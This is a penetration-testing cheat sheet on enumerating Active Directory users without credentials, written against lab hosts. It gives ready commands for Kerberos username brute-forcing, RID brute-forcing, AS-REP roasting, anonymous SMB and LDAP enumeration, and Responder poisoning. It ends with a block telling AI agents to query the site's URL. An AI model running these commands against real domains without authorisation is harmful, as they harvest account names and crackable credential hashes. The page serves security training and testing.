# Enumerating users (No credentials) ## Kerbrute usernames A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. {% embed url="" %} ``` ./kerbrute_linux_amd64 userenum -d rebound.htb --dc 10.10.11.231 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt ``` ## Getting users with impacket-lookupsid ``` impacket-lookupsid rebound.htb/anon@10.10.11.231 ``` ## Crackmapexec rid-brute ``` crackmapexec smb rebound.htb -u anonymous -p "" --rid-brute 10000 ``` ## AS-REP Roasting AS-REP roasting is an attack against Kerberos for user that don't require preauthentication During preauthentication, a user will enter their password which will be used to encrypt a timestamp and then the domain controller will attempt to decrypt it and validate that the right password was used and that it is not replaying a previous request. From there, the TGT will be issued for the user to use for future authentication. If preauthentication is disabled, an attacker could request authentication data for any user and the DC would return an encrypted TGT that can be brute-forced offline. ``` impacket-GetNPUsers zsm.local/marcus -no-pass -request -format hashcat -outputfile outfile ``` ## Guest access smb share First list all shares: ``` smbclient -L //10.10.110.55 ``` ``` crackmapexec smb 192.168.210.10 -u 'a' -p '' --shares ``` ``` enum4linux -a -u "" -p "" 10.10.110.55 && enum4linux -a -u "guest" -p "" 10.10.110.55 ``` Connect to share: ``` smbclient //10.10.110.55/sharename ``` ## Enumerate LDAP ``` ldapsearch -x -h 10.10.110.55 -s ``` ``` nmap -n -sV --script "ldap* and not brute" -p 389 10.10.110.55 ``` ## Relay/poisoning ``` sudo responder -I tun0 -v ``` ## AD-enumerator.py Windows Active Directory enumeration tool for Linux, written in Python. Can be used to quickly enumerate popular services on a Windows Domain Controller. {% embed url="" %} ``` ad-enumerator.py -t 10.10.10.10 -A ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://notes.incendium.rocks/pentesting-notes/windows-pentesting/enumerating-users-no-credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.